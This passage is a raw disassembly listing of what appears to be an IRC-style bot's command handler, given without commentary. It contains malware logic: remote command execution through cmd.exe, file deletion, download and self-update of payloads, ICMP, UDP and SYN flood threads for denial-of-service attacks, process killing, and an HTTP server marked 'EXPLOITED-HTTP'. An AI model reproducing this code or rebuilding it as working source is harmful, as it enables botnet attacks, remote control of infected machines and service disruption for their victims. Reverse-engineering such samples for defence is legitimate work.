push edx ; Source
lea eax, [ebp+var_13F4]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
lea ecx, [ebp+var_13F4]
push ecx ; SubStr
lea edx, [ebp+File]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea eax, [ebp+File]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 5 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
lea ecx, [ebp+File]
push ecx ; lpFile
push offset aOpen_6 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
lea edx, [ebp+var_13F4]
push edx ; char
push offset aOpenOpenedFile ; "{OPEN}: Opened file %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10007FE7: ; CODE XREF: sub_10007424+AD5�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aExec ; "exec"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100080F8
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jnz short loc_1000801A
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000801A: ; CODE XREF: sub_10007424+BEF�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx
push offset aS_3 ; " %s"
push 100h ; Count
lea eax, [ebp+var_16F4]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 100h ; Count
lea ecx, [ebp+var_16F4]
push ecx ; SubStr
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea eax, [ebp+var_15F4]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Source
lea eax, [ebp+var_16F4]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea ecx, [ebp+var_16F4]
push ecx ; SubStr
lea edx, [ebp+var_15F4]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax
push offset aCS ; "/C %s"
push 100h ; Count
lea eax, [ebp+Parameters]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; nShowCmd
push 0 ; lpDirectory
lea ecx, [ebp+Parameters]
push ecx ; lpParameters
push offset aCmd_exe ; "cmd.exe"
push offset aOpen_7 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
lea edx, [ebp+var_16F4]
push edx ; char
push offset aExecuteExecute ; "{EXECUTE}: Executed file %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100080F8: ; CODE XREF: sub_10007424+BDE�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aDelete ; "delete"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100081F8
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jnz short loc_1000812B
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000812B: ; CODE XREF: sub_10007424+D00�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx
push offset aS_4 ; " %s"
push 100h ; Count
lea eax, [ebp+var_18F4]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 100h ; Count
lea ecx, [ebp+var_18F4]
push ecx ; SubStr
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Source
lea eax, [ebp+var_18F4]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
lea ecx, [ebp+var_18F4]
push ecx ; SubStr
lea edx, [ebp+FileName]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; char
push offset aDeletedFileS__ ; "{DELETED}: FILE %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100081F8: ; CODE XREF: sub_10007424+CEF�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aSpeedtest ; "speedtest"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008349
mov ecx, [ebp+var_1D4]
cmp [ebp+ecx*4+Str2], 0
jnz short loc_1000822B
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000822B: ; CODE XREF: sub_10007424+E00�j
push 100h ; Count
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Str2]
push eax ; Source
lea ecx, [ebp+var_1A08]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Source], 0
jz short loc_10008274
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Source]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_2B50], eax
jmp short loc_1000827E
; ---------------------------------------------------------------------------
loc_10008274: ; CODE XREF: sub_10007424+E32�j
mov [ebp+var_2B50], 200h
loc_1000827E: ; CODE XREF: sub_10007424+E4E�j
mov edx, [ebp+var_2B50]
mov [ebp+var_1A0C], edx
push 10h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+var_84]
push ecx ; Source
lea edx, [ebp+var_1908]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov byte ptr [ebp+var_18F8], 0
lea eax, [ebp+var_1A08]
push eax ; int
push offset aSpeedtest_0 ; "speedtest"
call sub_1000A752
add esp, 8
mov [ebp+var_1A11+1], eax
cmp [ebp+var_1A11+1], 0FFFFFFFFh
jnz short loc_100082D9
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100082D9: ; CODE XREF: sub_10007424+EAE�j
lea ecx, [ebp+var_1A11+1]
push ecx
push offset sub_10005584
call sub_10004C65
add esp, 8
mov edx, [ebp+var_1A11+1]
imul edx, 0CCh
mov dword_10012EA0[edx], eax
mov eax, [ebp+var_1A11+1]
imul eax, 0CCh
cmp dword_10012EA0[eax], 0
jnz short loc_1000832A
push 1
mov ecx, [ebp+var_1A11+1]
push ecx
call sub_1000AB26
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000832A: ; CODE XREF: sub_10007424+EEE�j
; sub_10007424+F1E�j
mov edx, [ebp+var_18F8]
and edx, 0FFh
test edx, edx
jnz short loc_10008344
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000832A
; ---------------------------------------------------------------------------
loc_10008344: ; CODE XREF: sub_10007424+F14�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008349: ; CODE XREF: sub_10007424+DEF�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aDownlow ; "downlow"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008498
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Source], 0
jnz short loc_1000837C
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000837C: ; CODE XREF: sub_10007424+F51�j
push 100h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Source
lea edx, [ebp+var_1C14]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 100h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Source]
push ecx ; Source
lea edx, [ebp+var_1B14]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov [ebp+var_1A13], 0
mov al, [ebp+var_116]
mov [ebp+var_1A12], al
mov byte ptr [ebp+var_1A11], 0
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Source]
push edx
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; char
push offset aDownloadingDow ; "{DOWNLOADING}: Downloading file..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 10h
lea eax, [ebp+var_1C14]
push eax ; int
push offset aDownload ; "download"
call sub_1000A752
add esp, 8
mov [ebp+var_1C18], eax
cmp [ebp+var_1C18], 0FFFFFFFFh
jnz short loc_10008428
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008428: ; CODE XREF: sub_10007424+FFD�j
lea ecx, [ebp+var_1C18]
push ecx
push offset sub_10005380
call sub_10004C65
add esp, 8
mov edx, [ebp+var_1C18]
imul edx, 0CCh
mov dword_10012EA0[edx], eax
mov eax, [ebp+var_1C18]
imul eax, 0CCh
cmp dword_10012EA0[eax], 0
jnz short loc_10008479
push 1
mov ecx, [ebp+var_1C18]
push ecx
call sub_1000AB26
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008479: ; CODE XREF: sub_10007424+103D�j
; sub_10007424+106D�j
mov edx, [ebp+var_1A11]
and edx, 0FFh
test edx, edx
jnz short loc_10008493
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10008479
; ---------------------------------------------------------------------------
loc_10008493: ; CODE XREF: sub_10007424+1063�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008498: ; CODE XREF: sub_10007424+F40�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aIcmp ; "icmp"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100085D2
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Source], 0
jnz short loc_100084CB
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100084CB: ; CODE XREF: sub_10007424+10A0�j
push 80h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Source
lea edx, [ebp+var_1CA0]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Source]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_1CA4], eax
mov dl, [ebp+var_122]
mov [ebp+var_1C20], dl
mov byte ptr [ebp+var_1C1F], 0
lea eax, [ebp+var_1CA0]
push eax ; int
push offset aIcmpflood ; "icmpflood"
call sub_1000A752
add esp, 8
mov [ebp+Parameter], eax
cmp [ebp+Parameter], 0FFFFFFFFh
jnz short loc_10008540
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008540: ; CODE XREF: sub_10007424+1115�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea ecx, [ebp+Parameter]
push ecx ; lpParameter
push offset sub_1000B205 ; lpStartAddress
push 20000h ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov edx, [ebp+Parameter]
imul edx, 0CCh
mov dword_10012EA0[edx], eax
mov eax, [ebp+Parameter]
imul eax, 0CCh
cmp dword_10012EA0[eax], 0
jnz short loc_10008589
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008589: ; CODE XREF: sub_10007424+115E�j
; sub_10007424+117D�j
mov ecx, [ebp+var_1C1F]
and ecx, 0FFh
test ecx, ecx
jnz short loc_100085A3
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10008589
; ---------------------------------------------------------------------------
loc_100085A3: ; CODE XREF: sub_10007424+1173�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Source]
push eax
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; char
push offset aIcmpFloodingSF ; "ICMP-Flooding %s for %s seconds."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 10h
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100085D2: ; CODE XREF: sub_10007424+108F�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aUdp ; "udp"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008737
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+var_74], 0
jnz short loc_10008605
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008605: ; CODE XREF: sub_10007424+11DA�j
push 80h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Source
lea eax, [ebp+var_1D2E]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Source]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_1D30], ax
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+var_74]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
and eax, 0FFFFh
mov [ebp+var_1D34], eax
mov dl, [ebp+var_122]
mov [ebp+var_1CAE], dl
mov byte ptr [ebp+var_1CAD], 0
lea eax, [ebp+var_1D2E]
push eax ; int
push offset aUdpflood ; "udpflood"
call sub_1000A752
add esp, 8
mov [ebp+var_1D38], eax
cmp [ebp+var_1D38], 0FFFFFFFFh
jnz short loc_1000869A
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000869A: ; CODE XREF: sub_10007424+126F�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea ecx, [ebp+var_1D38]
push ecx ; lpParameter
push offset sub_1000B442 ; lpStartAddress
push 20000h ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov edx, [ebp+var_1D38]
imul edx, 0CCh
mov dword_10012EA0[edx], eax
mov eax, [ebp+var_1D38]
imul eax, 0CCh
cmp dword_10012EA0[eax], 0
jnz short loc_100086E3
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100086E3: ; CODE XREF: sub_10007424+12B8�j
; sub_10007424+12D7�j
mov ecx, [ebp+var_1CAD]
and ecx, 0FFh
test ecx, ecx
jnz short loc_100086FD
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_100086E3
; ---------------------------------------------------------------------------
loc_100086FD: ; CODE XREF: sub_10007424+12CD�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+var_74]
push eax
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Source]
push edx
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; char
push offset aUdpFloodingSOn ; "UDP-Flooding %s on port %s for %s secon"...
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 14h
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008737: ; CODE XREF: sub_10007424+11C9�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aSyn ; "syn"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008879
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+var_74], 0
jnz short loc_1000876A
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000876A: ; CODE XREF: sub_10007424+133F�j
push 80h ; Count
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Source
lea edx, [ebp+var_1DBE]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Source]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_1DC0], ax
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+var_74]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
and eax, 0FFFFh
mov [ebp+var_1DC4], eax
mov cl, [ebp+var_122]
mov [ebp+var_1D3E], cl
mov byte ptr [ebp+var_1D3D], 0
lea edx, [ebp+var_1DBE]
push edx ; int
push offset aSynflood ; "synflood"
call sub_1000A752
add esp, 8
mov [ebp+var_1DC8], eax
cmp [ebp+var_1DC8], 0FFFFFFFFh
jnz short loc_100087FF
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100087FF: ; CODE XREF: sub_10007424+13D4�j
mov eax, [ebp+var_1DC8]
imul eax, 0CCh
mov dword_10012EA0[eax], 0
xor ecx, ecx
test ecx, ecx
jnz short loc_10008820
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008820: ; CODE XREF: sub_10007424+13F5�j
; sub_10007424+1414�j
mov edx, [ebp+var_1D3D]
and edx, 0FFh
test edx, edx
jnz short loc_1000883A
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10008820
; ---------------------------------------------------------------------------
loc_1000883A: ; CODE XREF: sub_10007424+140A�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+var_74]
push ecx
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Source]
push eax
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx
push offset byte_1002C868 ; char
push offset aSSynFloodingSO ; "%s SYN-Flooding %s on port %s for %s se"...
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 18h
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008879: ; CODE XREF: sub_10007424+132E�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aDdosstop ; "ddosstop"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_100088D6
push offset aIcmpflood_0 ; "icmpflood"
call sub_1000A8D0
add esp, 4
push offset aUdpflood_0 ; "udpflood"
call sub_1000A8D0
add esp, 4
push offset aSynflood_0 ; "synflood"
call sub_1000A8D0
add esp, 4
push offset aDdosFloodHasSt ; "DDOS FLOOD HAS STOPPED"
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100088D6: ; CODE XREF: sub_10007424+1470�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aUpdate ; "update"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008AAA
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jnz short loc_10008909
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008909: ; CODE XREF: sub_10007424+14DE�j
mov ecx, [ebp+var_1D4]
cmp [ebp+ecx*4+Source], 0
jz short loc_10008937
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Source]
push eax ; Str2
push offset Name ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_10008937
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008937: ; CODE XREF: sub_10007424+14F0�j
; sub_10007424+150C�j
push 100h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Source
lea eax, [ebp+var_1FCC]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push 100h ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push 0Ch ; Count
call sub_10006FA2
push eax ; Source
lea edx, [ebp+var_20DC]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov al, [ebp+var_110]
mov byte ptr [ebp+var_1DCC], al
mov ecx, [ebp+var_1DCC]
and ecx, 0FFh
test ecx, ecx
jz short loc_100089A9
mov [ebp+var_2B54], offset aExe ; "exe"
jmp short loc_100089B3
; ---------------------------------------------------------------------------
loc_100089A9: ; CODE XREF: sub_10007424+1577�j
mov [ebp+var_2B54], offset aDll ; "dll"
loc_100089B3: ; CODE XREF: sub_10007424+1583�j
mov edx, [ebp+var_2B54]
push edx
lea eax, [ebp+var_20DC]
push eax
lea ecx, [ebp+Buffer]
push ecx
push offset aSS_S ; "%s\\%s.%s"
push 100h ; Count
lea edx, [ebp+var_1ECC]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
mov byte ptr [ebp+var_1DCC+1], 1
mov byte ptr [ebp+var_1DCC+2], 0
mov byte ptr [ebp+var_1DCC+3], 0
lea eax, [ebp+var_20DC]
push eax ; char
push offset aUpdatingUpdate ; "{UPDATING}: Updated file... [FILE: %s]"
lea ecx, [ebp+Dest]
push ecx ; int
call sub_10007303
add esp, 0Ch
lea edx, [ebp+var_1FCC]
push edx ; int
push offset aUpdate_0 ; "update"
call sub_1000A752
add esp, 8
mov [ebp+var_1FD0], eax
cmp [ebp+var_1FD0], 0FFFFFFFFh
jnz short loc_10008A3A
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008A3A: ; CODE XREF: sub_10007424+160F�j
lea eax, [ebp+var_1FD0]
push eax
push offset sub_10005380
call sub_10004C65
add esp, 8
mov ecx, [ebp+var_1FD0]
imul ecx, 0CCh
mov dword_10012EA0[ecx], eax
mov edx, [ebp+var_1FD0]
imul edx, 0CCh
cmp dword_10012EA0[edx], 0
jnz short loc_10008A8B
push 1
mov eax, [ebp+var_1FD0]
push eax
call sub_1000AB26
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008A8B: ; CODE XREF: sub_10007424+164F�j
; sub_10007424+167F�j
mov ecx, [ebp+var_1DCC+3]
and ecx, 0FFh
test ecx, ecx
jnz short loc_10008AA5
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10008A8B
; ---------------------------------------------------------------------------
loc_10008AA5: ; CODE XREF: sub_10007424+1675�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008AAA: ; CODE XREF: sub_10007424+14CD�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aHttpd ; "!httpd"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008AE5
push offset byte_1002C5D8 ; char
push offset aExploitedHttpS ; "{EXPLOITED-HTTP}: Started on %s:83...\r\n"...
lea ecx, [ebp+Dest]
push ecx ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008AE5: ; CODE XREF: sub_10007424+16A1�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aTl ; "tl"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008B1D
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+var_84]
push edx
call sub_1000A858
add esp, 4
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008B1D: ; CODE XREF: sub_10007424+16DC�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aTk ; "tk"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008B83
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Str2], 0
jnz short loc_10008B4C
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008B4C: ; CODE XREF: sub_10007424+1721�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Str1
call sub_1000A8D0
add esp, 4
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Str2]
push eax ; char
push offset aThreadsKilledT ; "{THREADS}: Killed thread %s..."
lea ecx, [ebp+Dest]
push ecx ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008B83: ; CODE XREF: sub_10007424+1714�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aKpid ; "kpid"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008BF3
mov ecx, [ebp+var_1D4]
cmp [ebp+ecx*4+Str2], 0
jnz short loc_10008BB2
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008BB2: ; CODE XREF: sub_10007424+1787�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Str2]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
push eax
call sub_1000AA09
add esp, 4
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; char
push offset aThreadsKille_0 ; "{THREADS}: Killed thread %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008BF3: ; CODE XREF: sub_10007424+177A�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aKat ; "kat"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008C39
call sub_1000AAE1
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; char
push offset aThreadsKilledA ; "{THREADS}: Killed all threads..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 0Ch
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008C39: ; CODE XREF: sub_10007424+17EA�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aPslist ; "pslist"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008C76
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+var_84]
push eax ; int
push offset dword_1002D128 ; Str2
call sub_1000998F
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008C76: ; CODE XREF: sub_10007424+1830�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aPskill ; "pskill"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008CC2
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jnz short loc_10008CA5
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008CA5: ; CODE XREF: sub_10007424+187A�j
push offset dword_1002D12C ; int
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Str2
call sub_1000998F
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008CC2: ; CODE XREF: sub_10007424+186D�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aPskillpid ; "pskillpid"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10008D13
mov edx, [ebp+var_1D4]
cmp [ebp+edx*4+Str2], 0
jnz short loc_10008CF1
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008CF1: ; CODE XREF: sub_10007424+18C6�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
push eax ; dwProcessId
call sub_10009949
add esp, 4
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008D13: ; CODE XREF: sub_10007424+18B9�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aHttpserver ; "httpserver"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10008E4E
mov ecx, [ebp+var_1D4]
cmp [ebp+ecx*4+Str2], 0
jnz short loc_10008D46
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008D46: ; CODE XREF: sub_10007424+191B�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Str2]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_24E4], ax
push 100h ; uSize
lea ecx, [ebp+FullPath]
push ecx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push 0 ; Ext
push 0 ; Filename
push 0 ; Dir
lea edx, [ebp+Drive]
push edx ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call ds:_splitpath ; _splitpath
add esp, 14h
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx
push offset byte_1002C5D8 ; char
push offset aHttpserverSS__ ; "{HTTPSERVER}: %s:%s...\r\n"
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 10h
mov byte ptr [ebp+var_21E1], 0
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; int
push offset aHttpd_0 ; "httpd"
call sub_1000A752
add esp, 8
mov [ebp+var_24EC], eax
cmp [ebp+var_24EC], 0FFFFFFFFh
jnz short loc_10008DE7
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008DE7: ; CODE XREF: sub_10007424+19BC�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_24EC]
push eax ; lpParameter
push offset sub_1000329E ; lpStartAddress
push 20000h ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_24EC]
imul ecx, 0CCh
mov dword_10012EA0[ecx], eax
mov edx, [ebp+var_24EC]
imul edx, 0CCh
cmp dword_10012EA0[edx], 0
jnz short loc_10008E30
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008E30: ; CODE XREF: sub_10007424+1A05�j
; sub_10007424+1A23�j
mov eax, [ebp+var_21E1]
and eax, 0FFh
